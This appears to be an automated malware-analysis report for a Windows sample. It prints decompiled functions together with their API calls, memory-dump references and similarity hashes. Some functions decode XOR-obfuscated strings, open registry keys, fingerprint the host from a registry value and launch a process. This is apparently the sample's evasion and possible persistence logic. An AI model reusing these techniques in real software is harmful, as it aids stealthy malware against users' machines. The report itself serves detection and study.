								_t246 = _t245 | E00B5EDC5(_t209, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E00B5EDC5(_t209, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E00B5EDC5(_t209, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E00B5EDC5(_t209, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E00B5EDC5(_t209, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E00B5EDC5(_t209, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E00B5EDC5(_t209, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E00B5EDC5(_t209, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E00B5EDC5(_t209, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E00B5EDC5(_t209, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E00B5EDC5(_t209, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E00B5EDC5(_t209, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while(1) {
										_t195 =  *_t226;
										if(_t195 == 0) {
											break;
										}
										_t61 = _t195 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t195 != 0x3b) {
												L16:
												_t226 = _t226 + 1;
												continue;
											}
											_t257 = _t226;
											do {
												_t196 = _t257 + 1;
												_t222 =  *_t196;
												 *_t257 = _t222;
												_t257 = _t196;
											} while (_t222 != 0);
											continue;
										}
										 *_t226 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00B5B26F(_v8);
								E00B564B8(_v8);
								E00B564B8(_v12);
								E00B564B8(_v16);
								goto L4;
							}
							E00B564B8(_t234);
							E00B564B8(_v12);
							L7:
							goto L4;
						}
						E00B564B8(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0xb690c0;
					L26:
					_t105 =  *(_t209 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E00B564B8( *(_t209 + 0x88));
							E00B564B8( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t231;
					 *(_t209 + 0x88) = _t236;
					return 0;
				}
			}

0x00b5b376
0x00b5b37d
0x00b5b380
0x00b5b383
0x00b5b38c
0x00b5b3ae
0x00b5b3b2
0x00b5b3b5
0x00b5b3bf
0x00b5b3d2
0x00b5b3d6
0x00b5b3d9
0x00b5b3e3
0x00b5b3f5
0x00b5b688
0x00b5b689
0x00b5b68b
0x00b5b693
0x00b5b697
0x00b5b69c
0x00b5b6a7
0x00b5b6b3
0x00b5b6bf
0x00b5b6cb
0x00b5b6d1
0x00b5b6d5
0x00b5b6d7
0x00b5b6d7
0x00000000
0x00b5b6d5
0x00b5b404
0x00b5b408
0x00b5b40b
0x00b5b415
0x00b5b429
0x00b5b42f
0x00b5b444
0x00b5b458
0x00b5b46f
0x00b5b489
0x00b5b491
0x00b5b4a3
0x00b5b4ba
0x00b5b4d1
0x00b5b4eb
0x00b5b502
0x00b5b519
0x00b5b530
0x00b5b54a
0x00b5b561
0x00b5b578
0x00b5b58f
0x00b5b5a9
0x00b5b5c0
0x00b5b5d7
0x00b5b5ee
0x00b5b608
0x00b5b624
0x00b5b652
0x00b5b661
0x00b5b661
0x00b5b665
0x00000000
0x00000000
0x00b5b656
0x00b5b656
0x00b5b65c
0x00b5b66b
0x00b5b660
0x00b5b660
0x00000000
0x00b5b660
0x00b5b66d
0x00b5b66f
0x00b5b66f
0x00b5b672
0x00b5b674
0x00b5b676
0x00b5b678
0x00000000
0x00b5b67c
0x00b5b65e
0x00000000
0x00b5b65e
0x00000000
0x00b5b667
0x00b5b62a
0x00b5b630
0x00b5b639
0x00b5b642
0x00000000
0x00b5b647
0x00b5b418
0x00b5b421
0x00b5b3eb
0x00000000
0x00b5b3eb
0x00b5b3e6
0x00000000
0x00b5b3e6
0x00b5b3c1
0x00000000
0x00b5b396
0x00b5b396
0x00b5b398
0x00b5b39b
0x00b5b6d9
0x00b5b6d9
0x00b5b6e1
0x00b5b6e3
0x00b5b6e3
0x00b5b6eb
0x00b5b6f0
0x00b5b6f4
0x00b5b6fc
0x00b5b704
0x00b5b70a
0x00b5b6f4
0x00b5b70e
0x00b5b713
0x00b5b719
0x00000000
0x00b5b719

APIs

_free.LIBCMT ref: 00B5B3B5
_free.LIBCMT ref: 00B5B3D9
_free.LIBCMT ref: 00B5B3E6
_free.LIBCMT ref: 00B5B40B
_free.LIBCMT ref: 00B5B418
_free.LIBCMT ref: 00B5B421
_free.LIBCMT ref: 00B5B6FC
_free.LIBCMT ref: 00B5B704

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 14b0c421b8980970873b6062475df14fe0a81ef53af8ddabfd4a6409ca382280
Instruction ID: c125d5a726baf6fa5991837ec093c05832e9b264c5fc99ac17e1089b7db72c6a
Opcode Fuzzy Hash: 14b0c421b8980970873b6062475df14fe0a81ef53af8ddabfd4a6409ca382280
Instruction Fuzzy Hash: FDC13472D40204AFDB20DBA8CC86FEE77F8AB48741F1441E5FE49FB286D6709A459760

Uniqueness

Uniqueness Score: -1.00%

Function 00B44A91, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00B44A91(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __eflags) {
				signed int _v8;
				signed int _v48;
				char _v55;
				short _v68;
				intOrPtr _v72;
				char _v139;
				short _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				char _v164;
				char _v184;
				struct _STARTUPINFOA _v260;
				struct _PROCESS_INFORMATION _v276;
				CHAR* _v280;
				CHAR* _v284;
				char _v291;
				char _v292;
				signed int _t49;
				CHAR* _t53;
				intOrPtr _t59;
				void* _t63;
				void _t64;
				void _t65;
				CHAR* _t71;
				char _t74;
				CHAR* _t90;
				CHAR* _t91;
				signed char _t92;
				void* _t97;
				signed int _t102;
				void* _t108;
				intOrPtr* _t109;
				void* _t112;
				signed int _t113;
				void* _t115;
				void* _t118;
				long _t123;
				intOrPtr* _t126;
				void* _t127;
				CHAR* _t128;
				CHAR* _t129;
				signed int _t132;
				void* _t134;

				_t132 =  &(_v260.lpDesktop);
				_t49 =  *0xb69014; // 0x26ce9e99
				_v8 = _t49 ^ _t132;
				_v260.dwY = E00B509A2();
				E00B42861(0x104, __esi, _t51);
				_t53 = E00B509A2();
				_t126 = __imp__SHGetFolderPathA;
				_t90 = _t53;
				_v260.lpDesktop = _t90;
				 *_t126(0, 0x1c, 0, 0, _t90, 0x208, 0x104);
				asm("movaps xmm0, [0xb3db90]");
				_t97 = 0;
				asm("movups [esp+0x7c], xmm0");
				_v152 = 0x73203423;
				_v148 = 0x36223410;
				_v144 = 4;
				do {
					_t7 = _t97 + 0x40; // 0x40
					 *(_t132 + _t97 + 0x7c) =  *(_t132 + _t97 + 0x7c) ^ _t7;
					_t97 = _t97 + 1;
				} while (_t97 < 0x19);
				_v139 = 0;
				lstrcatA(_t90,  &_v164);
				_t59 = E00B509A2();
				_v276.hThread = _t59;
				_t91 = E00B509A2();
				_v276.dwThreadId = _t91;
				 *_t126(0, 0x1c, 0, 0, _t91, 0x104, 0x40);
				asm("movaps xmm0, [0xb3da90]");
				asm("movups [esp+0x7c], xmm0");
				_t63 = E00B42D2B( &_v184);
				_t112 = _t63;
				_t127 = _t63;
				do {
					_t64 =  *_t112;
					_t112 = _t112 + 1;
				} while (_t64 != 0);
				_t113 = _t112 - _t127;
				_t17 = _t91 - 1; // -1
				_t118 = _t17;
				do {
					_t65 =  *(_t118 + 1);
					_t118 = _t118 + 1;
				} while (_t65 != 0);
				_t102 = _t113 >> 2;
				memcpy(_t118, _t127, _t102 << 2);
				memcpy(_t127 + _t102 + _t102, _t127, _t113 & 0x00000003);
				_t134 = _t132 + 0x18;
				_t128 = _v292;
				E00B4A313(_t91, _t128, _t128);
				lstrcatA(_t91, _t128);
				E00B48B24(_v292, _t91);
				_push(0x208);
				_t71 = E00B509A2();
				asm("movaps xmm0, [0xb3de70]");
				_t129 = _t71;
				asm("movups [esp+0x9c], xmm0");
				asm("movaps xmm0, [0xb3dc70]");
				_t108 = 0;
				asm("movups [esp+0xa8], xmm0");
				_v72 = 0xd1cbc58d;
				asm("movaps xmm0, [0xb3de60]");
				asm("movups [esp+0xb8], xmm0");
				_v68 = 0x99;
				asm("movaps xmm0, [0xb3db80]");
				asm("movups [esp+0xc8], xmm0");
				asm("movaps xmm0, [0xb3df50]");
				asm("movups [esp+0xd8], xmm0");
				asm("movaps xmm0, [0xb3df80]");
				asm("movups [esp+0xe8], xmm0");
				do {
					_t24 = _t108 + 0x40; // 0x40
					 *(_t134 + _t108 + 0x98) =  *(_t134 + _t108 + 0x98) ^ _t24;
					_t108 = _t108 + 1;
				} while (_t108 < 0x65);
				_t109 =  &_v156;
				_v55 = 0;
				_t115 = _t129 - _t109;
				do {
					_t74 =  *_t109;
					 *((char*)(_t115 + _t109)) = _t74;
					_t109 = _t109 + 1;
				} while (_t74 != 0);
				_t92 = 0x62;
				_v291 = 0;
				_v291 = 0;
				_v292 = _t92 ^ 0x00000040;
				lstrcatA(_t129,  &_v292);
				lstrcatA(_t129, _v284);
				_v291 = 0;
				_v292 = _t92 ^ 0x00000040;
				_v291 = 0;
				lstrcatA(_t129,  &_v292);
				_t123 = 0x44;
				E00B4D0F0(_t123,  &_v260, 0, _t123);
				_v260.cb = _t123;
				_v260.lpDesktop = 0xb699c0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA(_v280, _t129, 0, 0, 0, 0, 0, 0,  &_v260,  &_v276);
				return E00B4AE43(_v48 ^ _t134 + 0x0000000c);
			}

0x00b44a91
0x00b44a97
0x00b44a9e
0x00b44ab6
0x00b44aba
0x00b44ac4
0x00b44ac9
0x00b44acf
0x00b44ad5
0x00b44ade
0x00b44ae0
0x00b44ae7
0x00b44ae9
0x00b44aee
0x00b44af9
0x00b44b04
0x00b44b0e
0x00b44b0e
0x00b44b11
0x00b44b15
0x00b44b16
0x00b44b27
0x00b44b2f
0x00b44b33
0x00b44b3a
0x00b44b44
0x00b44b4e
0x00b44b52
0x00b44b54
0x00b44b5f
0x00b44b64
0x00b44b69
0x00b44b6b
0x00b44b6d
0x00b44b6d
0x00b44b6f
0x00b44b70
0x00b44b74
0x00b44b76
0x00b44b76
0x00b44b79
0x00b44b79
0x00b44b7c
0x00b44b7d
0x00b44b83
0x00b44b86
0x00b44b8d
0x00b44b8d
0x00b44b8f
0x00b44b94
0x00b44b9b
0x00b44ba2
0x00b44ba7
0x00b44bac
0x00b44bb1
0x00b44bb8
0x00b44bba
0x00b44bc3
0x00b44bca
0x00b44bcc
0x00b44bd4
0x00b44bdf
0x00b44be6
0x00b44bee
0x00b44bf8
0x00b44bff
0x00b44c07
0x00b44c0e
0x00b44c16
0x00b44c1d
0x00b44c25
0x00b44c25
0x00b44c28
0x00b44c2f
0x00b44c30
0x00b44c35
0x00b44c3c
0x00b44c48
0x00b44c4a
0x00b44c4a
0x00b44c4c
0x00b44c4f
0x00b44c50
0x00b44c56
0x00b44c59
0x00b44c60
0x00b44c65
0x00b44c6f
0x00b44c76
0x00b44c7b
0x00b44c84
0x00b44c8c
0x00b44c90
0x00b44c94
0x00b44c9c
0x00b44ca1
0x00b44cab
0x00b44cb3
0x00b44cb7
0x00b44cb8
0x00b44cb9
0x00b44ccf
0x00b44ced

APIs

Part of subcall function 00B42861: RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00B428DC

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44ADE
lstrcatA.KERNEL32(00000000,?), ref: 00B44B2F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00B44B52
lstrcatA.KERNEL32(00000000,?,?), ref: 00B44B9B
lstrcatA.KERNEL32(00000000,?), ref: 00B44C6F
lstrcatA.KERNEL32(00000000,?), ref: 00B44C76
lstrcatA.KERNEL32(00000000,?), ref: 00B44C90
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00B44CCF

Strings

#4 s, xrefs: 00B44AEE
Tett, xrefs: 00B44CAB

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$FolderPath$CreateOpenProcess
String ID: #4 s$Tett
API String ID: 2997047404-1022402705
Opcode ID: f3f3b7ff630584bbb4b679dd3a2efd3fe009a981c56fad75439be2f6dbf7438d
Instruction ID: d1f55ea46edd5c9a5dda0e3237a857593302cf42e04cb5f42ebc628ea5c371be
Opcode Fuzzy Hash: f3f3b7ff630584bbb4b679dd3a2efd3fe009a981c56fad75439be2f6dbf7438d
Instruction Fuzzy Hash: 906105614083859EE321DF38DC41BAFFBE8EF99308F00495DF9D897162EB7195898762

Uniqueness

Uniqueness Score: -1.00%

Function 00B4A313, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00B4A313(void* __ebx, void* __esi, CHAR* _a4) {
				signed int _v12;
				char _v247;
				char _v249;
				char _v253;
				char _v254;
				char _v258;
				char _v259;
				char _v263;
				char _v264;
				char _v272;
				char _v274;
				short _v276;
				intOrPtr _v280;
				char _v284;
				char _v285;
				char _v316;
				void* _v320;
				int _v324;
				signed int _t35;
				int* _t58;
				CHAR* _t64;
				signed int _t66;

				_t35 =  *0xb69014; // 0x26ce9e99
				_v12 = _t35 ^ _t66;
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x138], xmm0");
				asm("movaps xmm0, [0xb3dac0]");
				_t58 = 0;
				_t64 = _a4;
				asm("movups [ebp-0x128], xmm0");
				do {
					_t3 = _t58 + 0x40; // 0x40
					 *(_t66 + _t58 - 0x138) =  *(_t66 + _t58 - 0x138) ^ _t3;
					_t58 = _t58 + 1;
				} while (_t58 < 0x1f);
				_v285 = 0;
				if(RegOpenKeyExA(0x80000002,  &_v316, 0, 0x20119,  &_v320) == 0) {
					_v324 = 0x100;
					_v284 = 0x2b21200d;
					_t15 =  &_v284; // 0x2b21200d
					_v280 = 0x232b2d;
					_v276 = 0x2e203d;
					if(RegQueryValueExA(_v320, E00B427DA(_t15), 0, 0,  &_v272,  &_v324) == 0) {
						_t20 =  &_v284; // 0x2b21200d
						_push(_v247);
						_v264 = 0;
						_push( &_v253);
						_v259 = 0;
						_push( &_v258);
						_v254 = 0;
						_push( &_v263);
						_v249 = 0;
						_push( &_v272);
						_v284 = 0x30673265;
						_v280 = 0x34633661;
						_v276 = 0x2a6d;
						_v274 = 0;
						wsprintfA(_t64, E00B4282B(_t20));
						CharUpperBuffA(_t64, 0x17);
					}
					RegCloseKey(_v320);
				}
				return E00B4AE43(_v12 ^ _t66);
			}

0x00b4a31c
0x00b4a323
0x00b4a326
0x00b4a32e
0x00b4a337
0x00b4a33e
0x00b4a341
0x00b4a344
0x00b4a34b
0x00b4a34b
0x00b4a34e
0x00b4a355
0x00b4a356
0x00b4a361
0x00b4a382
0x00b4a38e
0x00b4a39f
0x00b4a3ac
0x00b4a3b2
0x00b4a3bc
0x00b4a3da
0x00b4a3e3
0x00b4a3e9
0x00b4a3f0
0x00b4a3f6
0x00b4a3fd
0x00b4a403
0x00b4a40a
0x00b4a410
0x00b4a417
0x00b4a41d
0x00b4a41e
0x00b4a428
0x00b4a432
0x00b4a43b
0x00b4a448
0x00b4a454
0x00b4a454
0x00b4a460
0x00b4a460
0x00b4a473

APIs

RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,76D681D0), ref: 00B4A37A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00B4A3D2
wsprintfA.USER32 ref: 00B4A448
CharUpperBuffA.USER32(?,00000017), ref: 00B4A454
RegCloseKey.ADVAPI32(?), ref: 00B4A460

Strings

= ., xrefs: 00B4A3BC
a6c4, xrefs: 00B4A428
!+, xrefs: 00B4A3AC
m*, xrefs: 00B4A432

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharCloseOpenQueryUpperValuewsprintf
String ID: !+$= .$a6c4$m*
API String ID: 4023059497-2212919601
Opcode ID: 8dd7eb5b41f850c21d5bc68df07b3587745e767e2043e62c679445f5c190eda7
Instruction ID: 1350593dab1eedc7fce22edc0a84e1ec3e302e11a023b76af5983642f2028b1b
Opcode Fuzzy Hash: 8dd7eb5b41f850c21d5bc68df07b3587745e767e2043e62c679445f5c190eda7
Instruction Fuzzy Hash: 1031707094426C9ADB21DF24DC91BEDFBBCAF19304F0041E9E549A3151EA705BD8DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B581F3, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B581F3(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0xb34c38;
				if(_t67 != 0xb34c38) {
					E00B564B8(_t67);
					_t36 = _a4;
				}
				E00B564B8( *((intOrPtr*)(_t36 + 0x3c)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x30)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x34)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x38)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x28)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x2c)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x40)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x44)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00B5803B(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00B5809C(_t71, _t75);
			}

0x00b581f3
0x00b581f8
0x00b581fe
0x00b58200
0x00b58206
0x00b58209
0x00b5820e
0x00b58211
0x00b58215
0x00b58220
0x00b5822b
0x00b58236
0x00b58241
0x00b5824c
0x00b58257
0x00b58262
0x00b58270
0x00b5827b
0x00b58283
0x00b58284
0x00b58287
0x00b5828d
0x00b58291
0x00b58295
0x00b58296
0x00b582a0
0x00b582a6
0x00b582a7
0x00b582aa
0x00b582b0
0x00b582b4
0x00b582b8
0x00b582c1

APIs

_free.LIBCMT ref: 00B58209

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B58215
_free.LIBCMT ref: 00B58220
_free.LIBCMT ref: 00B5822B
_free.LIBCMT ref: 00B58236
_free.LIBCMT ref: 00B58241
_free.LIBCMT ref: 00B5824C
_free.LIBCMT ref: 00B58257
_free.LIBCMT ref: 00B58262
_free.LIBCMT ref: 00B58270

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 37aad600ccc93047a1db93c528f597ab29cd3312a6ed496935ee37dae13b0946
Instruction ID: 301c289f1edfd37ecffe80376c257fc399740b68c4e2f19962dc498e4ae1af58
Opcode Fuzzy Hash: 37aad600ccc93047a1db93c528f597ab29cd3312a6ed496935ee37dae13b0946
Instruction Fuzzy Hash: 30218976900108AFCF41EF94C841DDD7BF9EF08351F8145E5BA15AB221DB35DA588B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B63CF6, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 148COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00B60306), ref: 00B63D0F

Strings

pow, xrefs: 00B63DAD, 00B63E57, 00B63EA4
acos, xrefs: 00B63E45
sqrt, xrefs: 00B63E4E
exp, xrefs: 00B63D8E, 00B63DF3
asin, xrefs: 00B63E3C
log10, xrefs: 00B63D51, 00B63D60
log, xrefs: 00B63D6C, 00B63D7B

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 0e044e5675206802bb2b54a347d1888f98c9ff06852128dee6cbc277cf5d2c0a
Instruction ID: 4e179611c378abf2f7ef6a740d44791ba04d2ba7f12838b3d8e032bbebb1490c
Opcode Fuzzy Hash: 0e044e5675206802bb2b54a347d1888f98c9ff06852128dee6cbc277cf5d2c0a
Instruction Fuzzy Hash: B1517A7190850ACBCF209F59D98C1ADBBF0FF45B14F2040D5D891A7258CB7A8A25DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00B42B76, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
registryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00B42B76(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v16;
				char _v17;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v40;
				void* _v44;
				signed int _v48;
				signed int _t39;
				char* _t41;
				char _t44;
				void* _t46;
				long _t48;
				void* _t52;
				void _t53;
				void _t54;
				char* _t63;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				signed int _t70;
				void* _t79;
				void* _t80;
				signed int _t81;
				intOrPtr _t83;
				void* _t84;
				void* _t90;
				signed int _t91;

				_t39 =  *0xb69014; // 0x26ce9e99
				_v12 = _t39 ^ _t91;
				_t83 = _a4;
				_push(0x208);
				_t41 = E00B509A2();
				asm("movaps xmm0, [0xb3dba0]");
				_t63 = _t41;
				asm("movups [ebp-0x24], xmm0");
				_v24 = 0x2426373f;
				_t65 = 0;
				_v20 = 0x332735;
				do {
					_t5 = _t65 + 0x40; // 0x40
					 *(_t91 + _t65 - 0x24) =  *(_t91 + _t65 - 0x24) ^ _t5;
					_t65 = _t65 + 1;
				} while (_t65 < 0x17);
				_t66 =  &_v40;
				_v17 = 0;
				_t79 = _t63 - _t66;
				do {
					_t44 =  *_t66;
					 *((char*)(_t66 + _t79)) = _t44;
					_t66 = _t66 + 1;
				} while (_t44 != 0);
				_v48 = _v48 & 0x00000000;
				_t46 = GetCurrentProcess();
				__imp__IsWow64Process(_t46,  &_v48);
				if(_t46 == 0 || _v48 == 0) {
					_t48 = RegOpenKeyA(0x80000001, _t63,  &_v44);
				} else {
					_t48 = RegOpenKeyExA(0x80000001, _t63, 0, 0x101,  &_v44);
				}
				if(_t48 == 0) {
					asm("movaps xmm0, [0xb3ddd0]");
					_t67 = 0;
					asm("movups [ebp-0x24], xmm0");
					_v24 = 0x733e3d31;
					_v20 = 0x3f223404;
					_v16 = 0;
					do {
						_t22 = _t67 + 0x40; // 0x40
						 *(_t91 + _t67 - 0x24) =  *(_t91 + _t67 - 0x24) ^ _t22;
						_t67 = _t67 + 1;
					} while (_t67 < 0x18);
					_push(_t67);
					_v16 = 0;
					E00B42CCF(_t67, _v44,  &_v40, _t83);
					_v28 = 0x2d37202c;
					_v24 = 0x35232d27;
					_v20 = 0x2e322c66;
					_v16 = 0;
					_t52 = E00B42810( &_v28);
					_t80 = _t52;
					_t90 = _t52;
					do {
						_t53 =  *_t80;
						_t80 = _t80 + 1;
					} while (_t53 != 0);
					_t81 = _t80 - _t90;
					_t84 = _t83 - 1;
					do {
						_t54 =  *(_t84 + 1);
						_t84 = _t84 + 1;
					} while (_t54 != 0);
					_t70 = _t81 >> 2;
					memcpy(_t84, _t90, _t70 << 2);
					memcpy(_t90 + _t70 + _t70, _t90, _t81 & 0x00000003);
					RegCloseKey(_v44);
					E00B50985(_t63);
				} else {
				}
				return E00B4AE43(_v12 ^ _t91);
			}

0x00b42b7c
0x00b42b83
0x00b42b89
0x00b42b8c
0x00b42b91
0x00b42b96
0x00b42b9d
0x00b42ba0
0x00b42ba4
0x00b42bab
0x00b42bad
0x00b42bb4
0x00b42bb4
0x00b42bb7
0x00b42bbb
0x00b42bbc
0x00b42bc1
0x00b42bc4
0x00b42bcc
0x00b42bce
0x00b42bce
0x00b42bd0
0x00b42bd3
0x00b42bd4
0x00b42bd8
0x00b42be0
0x00b42be7
0x00b42bef
0x00b42c1a
0x00b42bf7
0x00b42c08
0x00b42c08
0x00b42c22
0x00b42c2b
0x00b42c32
0x00b42c34
0x00b42c38
0x00b42c3f
0x00b42c46
0x00b42c4a
0x00b42c4a
0x00b42c4d
0x00b42c51
0x00b42c52
0x00b42c57
0x00b42c5c
0x00b42c64
0x00b42c6c
0x00b42c73
0x00b42c7a
0x00b42c81
0x00b42c85
0x00b42c8a
0x00b42c8c
0x00b42c8e
0x00b42c8e
0x00b42c90
0x00b42c91
0x00b42c95
0x00b42c97
0x00b42c98
0x00b42c98
0x00b42c9b
0x00b42c9c
0x00b42ca5
0x00b42ca8
0x00b42caf
0x00b42cb1
0x00b42cb8
0x00b42c24
0x00b42c24
0x00b42ccc

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 00B42BE0
IsWow64Process.KERNEL32(00000000), ref: 00B42BE7
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000101,?), ref: 00B42C08
RegOpenKeyA.ADVAPI32(80000001,00000000,?), ref: 00B42C1A
RegCloseKey.ADVAPI32(?,?,?,?,00000001), ref: 00B42CB1

Strings

f,2., xrefs: 00B42C7A
'-#5, xrefs: 00B42C73
, 7-, xrefs: 00B42C6C

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess$CloseCurrentWow64
String ID: '-#5$, 7-$f,2.
API String ID: 3785737565-2631701596
Opcode ID: f688f145ee64f6289b4f2d9ce8bb2f36469339ecadd9f2c1d4e6fb985bbb35d6
Instruction ID: ff540c6a9e4517263457a1eece7489957363b5e0b10d5d039dabd520ae5cf630
Opcode Fuzzy Hash: f688f145ee64f6289b4f2d9ce8bb2f36469339ecadd9f2c1d4e6fb985bbb35d6
